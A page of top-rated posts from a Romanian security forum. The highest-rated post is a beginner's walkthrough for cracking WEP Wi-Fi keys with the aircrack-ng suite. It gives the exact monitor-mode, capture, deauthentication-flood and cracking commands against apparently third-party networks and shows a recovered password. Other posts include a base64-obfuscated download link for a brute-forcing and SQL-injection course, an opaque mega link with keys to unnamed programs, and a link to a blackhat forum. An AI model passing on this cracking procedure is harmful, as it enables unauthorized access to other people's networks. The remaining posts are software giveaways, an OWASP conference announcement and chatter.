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Showing content with the highest reputation on 07/24/16 in all areas

  1. EXPLICATIE PENTRU PROSTI: Ce-ti trebuie? Kali Linux+ placa de wifi. Personal am incercat de pe un rasp si un adaptor TL-WN722N.Kali l-a detectat direct, fara probleme. De unde incep? Deschid terminal, si scriu airmon-ng.Daca-mi apare ceva de genul e de bine, am o placa wireless cu care-mi pot face treaba.A se tine cont ca e numita wlan0. Acum scriu airmon-ng start wlan0 (sau cum e numita placa) si ar trebui sa apara asta : Daca apar mai multe procese care pot cauza probleme, de ex 2274, le puteti inchide folosind "kill 2274(PID CODE); Next : airodump-ng mon0, pentru a vedea retelele wifi disponibile. Aici se paote vedea ca retelele cu WEP sunt mtnl, si priyan chahal Acum scriem: airodump-ng –w mtnlcr –c 4 –bssid 0C:D2:B5:03:43:68 mon0 Dupa -w se pune un nume pentru un viitor fisier ce va fi creat, dupa -c se pune canalul, iar dupa -bssid ..bssid -ul. Dupa ce am scris comanda, asteptam sa se trimita pachete.Un 15k ar fi destule.Daca nu se acumuleaza destule, deschizi un tab nou in care scrii : aireplay-ng -0 0 -a 0C:D2:B5:03:43:68 mon0 si vei genera mai multe pachete. Dupa toate astea, mai ramane un singur lucru.Scrie aircrack-ng mtnlcr-01.cap Numele este cu 01, in cazul in care este prima data cand incerci.Daca incerci iar si n-ai sters fisierul creat anterior, se va genera cu 02, 03 etc. Cam asa a aratat rezultatul final la mine In cazul de mai sus, parola este : 6119500401
    2 points
  2. http://sharewareonsale.com/s/net-monitor-professional-giveaway-coupon-sale Sale ends in 2 days 10 hours 16 mins 49 secs
    2 points
  3. Papagali eMag. Ofera "de toate" dar cel mai probabil nimic cum trebuie. Cat despre "Conditiile" lor sunt penibile Uite asa capata link building gratuit.
    2 points
  4. Understand the web application penetration testing methodology and toolkit Interact with web applications using Python and the Requests library Write a web crawler/spider with the Scrapy library Create an HTTP bruteforcer based on Requests Create a Password bruteforcer for Basic, NTLM, and Forms authentication Detect and exploit SQL injections vulnerabilities by creating a script all by yourself Intercept and manipulate HTTP communication using Mitmproxy Download (valabil 7 zile): aHR0cDovL3guY28vNmxnRGQ=
    1 point
  5. In acest an conferinta OWASP locala va avea loc pe 6 octombrie la Sheraton Hotel Bucharest si va fi un eveniment de o zi cu prezentari si doua traininguri focusate pe securitatea aplicatiilor. Detaliile despre OWASP Bucharest AppSec Conference 2016 vor fi publicate aici: https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2016 Inregistrarea prezentarilor se realizeaza aici. Oportunitatile de sponsorizare sunt in acest document. Va puteti inscrie cu prezentari sau workshop-uri din urmatoarele arii si nu numai: • Security aspects of new / emerging web technologies / paradigms / languages / frameworks • Secure development: frameworks, best practices, secure coding, methods, processes, SDLC, etc. • Security of web frameworks (Struts, Spring, ASP.Net MVC, RoR, etc) • Vulnerability analysis (code review, pentest, static analysis etc) • Threat modelling of applications • Mobile security and security for the mobile web • Cloud security • Browser security and local storage • Countermeasures for application vulnerabilities • New technologies, paradigms, tools • Application security awareness and education • Security in web services, REST, and service oriented architectures • Privacy in web apps, Web services and data storage Important: termenul limita pentru inscrierea prezentarilor este 28 august lista speakerilor confirmati va fi anuntata pe 1 septembrie conferinta va avea loc pe 6 octombrie prezentarile vor avea durata de 40 de minute fiecare va exista un speaker agreement
    1 point
  6. http://sharewareonsale.com/s/steganos-okayfreedom-vpn-giveaway-coupon-sale Oferta este valabila !! Dupa dati download de pe linkul de sus apoi bagati mailul vostru o sa primit un mail cu: DIRECTIONS The download link for OkayFreedom VPN Premium is given to you above. To get your license key, click here to go to the registration page and submit the form. You will then be emailed your license key. Once you get your license key, download OkayFreedom VPN Premium and install it. Once installed, run OkayFreedom VPN Premium and register OkayFreedom VPN Premium with the key you were given. You can register by right-clicking OkayFreedom VPN Premium’s system tray icon and clicking on “Enter Premium code (serial number)”. You know you’ve successfully registered when you right-click on OkayFreedom VPN Premium’s system tray icon and it says “You are a flat rate user! Thank You!”. Enjoy! Clic pe "click here to go to the registration page" si o sa primiti mail cu licenta ! @sandu69 Sale ends in 11 hours 31 mins 32 secs
    1 point
  7. Photo Watermark Ashampoo GetBack Photo Video to GIF Animation Duplicate Photo Finder Plus Animated Screensaver Maker TriSunSoft PDF to JPG Focusky Pro IF NEEDED, PLEASE GO TO: Watermark Software Santa Brings X Christmas Box - 5 More Amazing Software Compound Giveaways It will last til Jan 8, 2016 and happy New Year....
    1 point
  8. he Virtual Environment for secured and comfortable Web Browsing Browsing the Internet has become an absolutely necessary tool in today’s work environments. Collecting information cannot be thought of without using the web. At the same time our computers are processing confidential and critical information like personal or company internal data. The huge benefit of the Internet comes along with constantly changing threats. The development of browser versions in the past years can be understood - besides all functional progresses - as a constant race in the battle against various attack scenarios. Latest since the Internet has become active with the evolvement of “Web 2.0” the balance between threats and benefits has been lost. “Active content” has become a standard part on modern web sites. Actual websites are more and more indistinguishable from full blown native applications. Programming interfaces like JavaScript, Java, ActiveX or VBScript provide means for accessing the computer and its resources like its file system or webcam. Trojan horses and viruses can abuse such powerful tools e.g. to steal confidential data. Companies and authorities alike are facing a dilemma: to limit the use of the Internet substantially or to find a way of living with existing threats. Single user version freely available for private persons The virtual surf environment "Browser in the Box" has initially been developed by Sirrix on behalf of the German Federal Office for Information Security for use by all federal authorities. Now the solution is open for anyone and enables users to surf the Internet with confidence - even when using most modern and comfortable web technologies without limitation despite otherwise usual advice. On the basis of a “Browser-in-the-Box” concept a virtual machine is provided with a reduced operating system and a web browser encapsulated therein. Malware cannot thus penetrate the host operating system; a potential damage in the separated virtual machine will vanish with each start of the browser by returning to a certified starting point. All of that is fully transparent to the user. Protection against malware and data Leakage In contrast to simple sandboxing methods provided by standard browsers "Browser in the Box" isolates all activities of the browser completely from the host operating system. Merely a single shared folder within the host is made accessible for a separate user account. This folder stores all persistent configuration data like favorites of the browser. Equally all downloaded files are initially stored in this folder and are only forwarded into the normal user accessible download folder after a malware scan. Besides this extensive protection of the host system against any attacks from the Internet, "Browser in the Box" reliably prevents any uploads of files into the Internet. Hence, the confidentiality of critical company or authority information is not already jeopardized by simply providing Internet access to its employees. "Browser in the Box" provides a cost efficient and carefree surf environment without any limitation in comfort. The expensive and complex usage of dedicated terminal servers as an alternative for secure surfing can be avoided. The performance impact is minimal for today’s computer architectures. Browser in the Box | Sirrix Aktiengesellschaft Download: Browser in the Box - Download | Sirrix Aktiengesellschaft
    1 point
  9. Ar fi ceva sa-ti ceara pretul real
    1 point
  10. The Scottish Pokemon https://www.facebook.com/lee.gilmour.12/videos/869768619822883/
    1 point
  11. Va salut pe toti! Doua programele care va pot fi de folos, daca nu ele atunci db din ele. Spor! Link: https://mega.nz/#!WhxnhKYb Decription key: !hS5h6-Y_i7kD2_Ksixh2TapXjghOw0LoQ4Dc5xokGHE Pass: d&q/zoT
    1 point
  12. 2015 sclav (firme) (locale)
    1 point
  13. Domnu moderator ... as lasa mai usor cu jignirile Totusi nu va sta bine sa vorbiti urat.
    0 points
  14. http://bestblackhatforum.com/index.php
    -1 points
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